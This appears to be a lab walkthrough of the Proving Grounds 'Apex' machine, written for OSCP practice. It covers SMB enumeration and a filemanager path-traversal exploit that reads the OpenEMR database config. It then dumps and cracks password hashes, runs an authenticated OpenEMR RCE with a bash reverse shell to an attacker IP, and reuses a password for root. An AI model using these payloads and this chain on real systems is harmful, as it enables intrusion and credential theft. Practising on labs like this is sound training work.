Proving grounds:Apex
Today we will take a look at Proving grounds: Apex. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
└─$ sudo nmap -Pn -p- -sS --open --min-rate 10000 -oN nmap/quick 192.168.168.145
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 07:19 EST
Nmap scan report for 192.168.168.145
Host is up (0.10s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3306/tcp open mysql- smb(445)
└─$ smbmap -H 192.168.168.145
[+] Guest session IP: 192.168.168.145:445 Name: 192.168.168.145
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
docs READ ONLY Documents
IPC$ NO ACCESS IPC Service (APEX server (Samba, Ubuntu))
┌──(kali㉿kali)-[~/OSCP/pg]
└─$ smbclient '//192.168.168.145\docs'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Apr 9 11:47:12 2021
.. D 0 Fri Apr 9 11:47:12 2021
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021
16446332 blocks of size 1024. 10826908 blocks available
smb: \> exitWe don’t need it yet
- feroxbuster
┌──(kali㉿kali)-[~/OSCP/pg]
└─$ feroxbuster --url http://192.168.168.145/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
- filemanager
With the smb port we see that this is an integration
When we click on the question icon in the left corner
Look for an exploit for this version
Try checking manually.
Here we see that some extensions are allowed.
└─$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.php&new_content=Hacked" -H "Cookie: PHPSESSID=gn1fevoieueli7ji100gcfrmot" "http://192.168.168.145/filemanager/execute.php?action=create_file"
File extension is not allowed. Valid extensions: txt, log, xml, html, css, htm, js, However, there were .pdf files in the previous folder.
Therefore, I change the directory in the payload to read the .php files as well.
As you can see, the file was created in the folder we selected
└─$ python3 exploit.py http://192.168.168.145 PHPSESSID=gn1fevoieueli7ji100gcfrmot /etc/passwd
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.168.145 Port 80</address>
</body></html>
└─$ smbclient '//192.168.168.145\docs'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 17 07:29:53 2022
.. D 0 Fri Apr 9 11:47:12 2021
passwd N 1607 Sat Dec 17 07:29:53 2022
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021
16446332 blocks of size 1024. 10808128 blocks available
smb: \> exitWhen we look at the files, we see that openemr. When we type /openemr it takes us to a new site. Therefore, we search openemr’s github page and find the location of its database file.
└─$ python3 exploit.py http://192.168.168.145 PHPSESSID=gn1fevoieueli7ji100gcfrmot /var/www/openemr/sites/default/sqlconf.php
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.168.145 Port 80</address>
</body></html>Take the file and look at its contents.
└─$ smbclient '//192.168.168.145\docs'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 17 07:30:19 2022
.. D 0 Fri Apr 9 11:47:12 2021
passwd N 1607 Sat Dec 17 07:29:53 2022
sqlconf.php N 639 Sat Dec 17 07:30:19 2022
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021
16446332 blocks of size 1024. 10806848 blocks available
smb: \> mget sqlconf.php
Get file sqlconf.php? y
getting file \sqlconf.php of size 639 as sqlconf.php (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \> exit
- mysql
└─$ mysql -u openemr -pC78maEQUIEuQ -h 192.168.168.145 -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 31
Server version: 10.1.48-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| openemr |
+--------------------+
2 rows in set (0.743 sec)
MariaDB [(none)]> use openemr;
Database changed
MariaDB [openemr]> show tables;
MariaDB [openemr]> select username, password from users_secure;Here we see openemr’s credentials.
- hashcat
hashcat.exe -m 3200 -a 0 hash.txt rockyou.txt
- openemr
/openemr
Look for an exploit for the version of Openemr.
└─$ searchsploit openemr
``
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated) | php/webapps/45161.py
``
└─$ searchsploit -m php/webapps/45161.py
Exploit: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/45161
Path: /usr/share/exploitdb/exploits/php/webapps/45161.py
Codes: N/A
Verified: True
File Type: ASCII text
Copied to: /home/kali/OSCP/pg/45161.pyIf we look at the content of the payload, we will see how it works
Take a shell in reverse.
└─$ python2 45161.py http://192.168.168.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.49.168/445 0>&1'
- root
The password we found earlier is the root password
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
